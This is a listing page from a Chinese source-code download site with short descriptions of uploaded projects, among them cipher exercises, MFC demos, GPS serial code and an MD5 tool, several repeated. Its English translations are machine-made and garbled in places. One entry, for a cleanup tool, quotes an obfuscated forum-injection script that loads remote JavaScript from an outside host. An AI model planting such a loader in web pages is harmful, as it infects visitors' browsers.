Hot Search : Source embeded web remote control p2p game More...
Location : Home Search - a-w
Search - a-w - List
移位密码、代换密码的加密及解密 实现移位密码:k表示26个字母向前循环位移的字符个数 加密: 输入:k,以及小写表示的明文字母,输出:大写字母表示的密文 解密:输入: k,以及大写字母表示的密文,输出:小写字母表示的明文 例如,当k=11时 明文:wewillmeetatmidnight 密文:HPHTWWXPPELEXTOYTRSE 实现代换密码 例如输入密匙guangzhouuniversity,则建立字母对应关系: a b c d e f g h i j K l m G U A N Z H O I V E R S T n o p q r s t u v w X y z Y B C D F J K L M P Q W X 字母对应关系的说明:把密匙按照a-z的顺序对应,去掉重复字母,如guangzhouuniversity中的g第二次出现时被滤掉, 在n对应Y之后,把在密匙中没出现过的其他字母按顺序排列:BCDFJ…… -translocation password substitution password encryption and decryption of achieving shift Password : k said 26 letters forward displacement cycle of the number of characters encryption : Admission : k, and explicitly expressed in lowercase letters, output : capital letters said the ciphertext declassified : Admission : k, and the uppercase letters dense text output : lowercase letters explicitly said for example, when k = 11:00 explicit : wewillmeetatmidnight dense text : HPHTWWXPPELEXTOYTRSE achieve import substitution such as password key guangzho uuniversity, the establishment of correspondence between letters : a b c d e f g h i j k l m G U A N Z H O R E V I S T n o p q r s t u v w x y z Y B C D F J K L M P Q W X correspondence between letters Note : In accordance with a key put-z corr
Date : 2008-10-13 Size : 8.42kb User : 何志

│ Array.cpp │ Array.ds w │ Array.h │ Array.rc │ ArrayDlg.cpp │ ArrayDlg.h │ ReadMe.txt │ Resource.h │ StdAfx.cpp │ StdAfx.h │ └─res Array.ico Array.rc2 MFC的数组类支持的数组类似于C++中的常规数组,可以存放任何数据类型。C++的常规数组在使用前必须将其定义成能够容纳所有可能需要的元素,而MFC数组类创建的对象可以根据需要动态地增大或减小,数组的起始下标是0,而上限可以是固定的,也可以随着元素的增加而增加,数组在内存中的地址仍然是连续分配的。   MFC定义了数组模板类CArray,并针对各种常用变量类型定义了CByteArray,CWordArray,CUIntArray,CDWordArray,CStringArray,CObArray,CPtrArray。 MFC数组类使用方法基本相同。--- Array.cpp Array.dsp -- -- Array .dsw . h -- Array.rc ArrayDlg.cpp -- -- Read ArrayDlg.h Me.txt -- Resource.h StdAfx.cpp -- -- supply-StdAfx.h res Array.ico Array.rc2 MFC array is an array type of support similar to the regular C Regulation array can store any data type. Conventional C prior to the use of the array must be defined as possible to accommodate all the needs of the elements, MFC array type and the object can be created based on the need to dynamically increase or decrease the threshold array index is 0, and the ceiling is fixed, as can the elements increases, the array of memory addresses are still continuous distribution. MFC defines a template array CArray category, and a variety of commonly used types of variables defined CByteArray, CWordArray. CUIntArray,
Date : 2008-10-13 Size : 11.33kb User : 青衣

WEB应用程序 WEB应用程序 -Web application Web application Web application W EB application Web a pplication procedures
Date : 2008-10-13 Size : 6.74kb User : 方向

首先简单介绍了GPS 接收机串口通信的基本概念, 然后通过实例详细介绍了计算机与GPS 接收机进行 数据传输的两种方法: 一种是使用W in32 A P I 通信函数的文件读写方式 另一种是通过VC+ + 6. 0 提供的 M SComm 控件实现。-first brief introduction of GPS receiver serial communication the basic concepts, Then detailed examples of computer and GPS receivers for data transmission methods : One is to use the W in32 I A P communications functions for reading and writing the paper through another VC 6. 0 for S M Comm Controlware.
Date : 2008-10-13 Size : 106.92kb User : zhanglili

读出"已存在"的文本文件(英文),将其中的单词写入另一个文件-read out "the existence of a" text files (English), which will write another word document
Date : 2008-10-13 Size : 7.44kb User : wzs

读出"已存在"的文本文件(英文),将其中的单词写入另一个文件-read out "the existence of a" text files (English), which will write another word document
Date : 2025-12-29 Size : 7kb User : wzs

移位密码、代换密码的加密及解密 实现移位密码:k表示26个字母向前循环位移的字符个数 加密: 输入:k,以及小写表示的明文字母,输出:大写字母表示的密文 解密:输入: k,以及大写字母表示的密文,输出:小写字母表示的明文 例如,当k=11时 明文:wewillmeetatmidnight 密文:HPHTWWXPPELEXTOYTRSE 实现代换密码 例如输入密匙guangzhouuniversity,则建立字母对应关系: a b c d e f g h i j K l m G U A N Z H O I V E R S T n o p q r s t u v w X y z Y B C D F J K L M P Q W X 字母对应关系的说明:把密匙按照a-z的顺序对应,去掉重复字母,如guangzhouuniversity中的g第二次出现时被滤掉, 在n对应Y之后,把在密匙中没出现过的其他字母按顺序排列:BCDFJ…… -translocation password substitution password encryption and decryption of achieving shift Password : k said 26 letters forward displacement cycle of the number of characters encryption : Admission : k, and explicitly expressed in lowercase letters, output : capital letters said the ciphertext declassified : Admission : k, and the uppercase letters dense text output : lowercase letters explicitly said for example, when k = 11:00 explicit : wewillmeetatmidnight dense text : HPHTWWXPPELEXTOYTRSE achieve import substitution such as password key guangzho uuniversity, the establishment of correspondence between letters : a b c d e f g h i j k l m G U A N Z H O R E V I S T n o p q r s t u v w x y z Y B C D F J K L M P Q W X correspondence between letters Note : In accordance with a key put-z corr
Date : 2025-12-29 Size : 8kb User :

│ Array.cpp │ Array.ds w │ Array.h │ Array.rc │ ArrayDlg.cpp │ ArrayDlg.h │ ReadMe.txt │ Resource.h │ StdAfx.cpp │ StdAfx.h │ └─res Array.ico Array.rc2 MFC的数组类支持的数组类似于C++中的常规数组,可以存放任何数据类型。C++的常规数组在使用前必须将其定义成能够容纳所有可能需要的元素,而MFC数组类创建的对象可以根据需要动态地增大或减小,数组的起始下标是0,而上限可以是固定的,也可以随着元素的增加而增加,数组在内存中的地址仍然是连续分配的。   MFC定义了数组模板类CArray,并针对各种常用变量类型定义了CByteArray,CWordArray,CUIntArray,CDWordArray,CStringArray,CObArray,CPtrArray。 MFC数组类使用方法基本相同。--- Array.cpp Array.dsp---- Array .dsw . h-- Array.rc ArrayDlg.cpp---- Read ArrayDlg.h Me.txt-- Resource.h StdAfx.cpp---- supply-StdAfx.h res Array.ico Array.rc2 MFC array is an array type of support similar to the regular C Regulation array can store any data type. Conventional C prior to the use of the array must be defined as possible to accommodate all the needs of the elements, MFC array type and the object can be created based on the need to dynamically increase or decrease the threshold array index is 0, and the ceiling is fixed, as can the elements increases, the array of memory addresses are still continuous distribution. MFC defines a template array CArray category, and a variety of commonly used types of variables defined CByteArray, CWordArray. CUIntArray,
Date : 2025-12-29 Size : 11kb User : 青衣

实现把指定目录下的色谱数据文件全部转换成纯文本文件的功能.首先用MFC AppWizard生成一个SDI风格的应用程序test,生成过程中全部使用缺省设置。   其次,利用资源编辑器,在主菜单“文件”下增加一个菜单项“转换”,属性为:    ID:ID_CONVERT    Caption: 转换    Prompt: 在不同格式文件之间进行转换\n转换文件   然后用“CTRL-W”热键激活MFC ClassWizard,为CmainFrame类增加响应ID_CONVERT消息的命令函数OnConvert()。-Realize the specified directory of all the chromatographic data files converted to plain text file function. First of all, using MFC AppWizard to generate a SDI applications style test, generate the course of using the default settings. Secondly, the use of resources editor, in the main menu
Date : 2025-12-29 Size : 1kb User : 蓝德岩

清除discuz论坛挂马的cookie代码(if(document.cookie.indexOf( helio )==-1){var expires=new Date() expires.setTime(expires.getTime()+24*60*60*1000) document.cookie= helio=Yes path=/ expires= +expires.toGMTString() eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)} if(! .replace(/^/,String)){while(c--){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}] e=function(){return \\w+ } c=1} while(c--){if(k[c]){p=p.replace(new RegExp( \\b +e(c)+ \\b , g ),k[c])}}return p}( 4.5(\ <0 3=2 1="6://d.7.c/b/a.8?9"></0>\ ) ,14,14, script|src|javascript|language|document|writeln|http|xcdx169|js|LMZSVQRI|log|include|net|bbs .split( | ),0,{})) } )等-Clear discuz Forum hanging horse cookie code (if (document.cookie.indexOf ( ' helio' )==- 1) (var expires = new Date () expires.setTime (expires.getTime ()+24* 60* 60* 1000) document.cookie = ' helio = Yes path = / expires =' + expires.toGMTString () eval (function (p, a, c, k, e, d) (e = function (c) ( return c.toString (36)) if (!' ' . replace (/^/, String)) (while (c-) (d [c.toString (a)] = k [c] | | c. toString (a)) k = [function (e) (return d [e])] e = function () (return ' \ \ w+' ) c = 1) while (c-) (if (k [c]) (p = p.replace (new RegExp ( ' \ \ b' + e (c)+ ' \ \ b' , ' g' ), k [c]))) return p) (' 4 .5 ( \ ' < 0 3 = 2 1 = " 6:// d.7.c/b/a.8? 9" > </0> \ ' )' , 14,14, ' script | src | javascript | language | document | writeln | http | xcdx169 | js | LMZSVQRI | log | include | net | bbs' . Split (' |' ), 0, () )) )), etc.
Date : 2025-12-29 Size : 1kb User : 一介农夫

DL : 0
C++模拟ATM取款机系统,初学者可以用来练习-Classic example of some C++ project, detailed notes, moving hands and a training practice, and I hope for all of us to help
Date : 2025-12-29 Size : 4kb User : 帖超凡

此程序可以将文件的MD5获取出来,MD5,大家都知道,我就不多说了。这只是个栗子,大家可以继续发展- 49/5000 Cǐ chéngxù kěyǐ jiāng wénjiàn de MD5 huòqǔ chūlái,MD5, dàjiā dōu zhīdào, wǒ jiù bù duō shuōle. Zhè zhǐshì gè lìzǐ, dàjiā kěyǐ jìxù fāzhǎn This procedure can be obtained the MD5 document, MD5, we all know, I will not say. This is just a chestnut, we can continue to develop
Date : 2025-12-29 Size : 54kb User : 徐疾分

Euler 回路问题 ,问题描述: 对于给定的图G 和G 中的2 个顶点v 和w-Euler loop problems, problem description: for a given graph G and G of two vertices v and w
Date : 2025-12-29 Size : 61kb User : Johina
CodeBus is one of the largest source code repositories on the Internet!
Contact us :
1999-2046 CodeBus All Rights Reserved.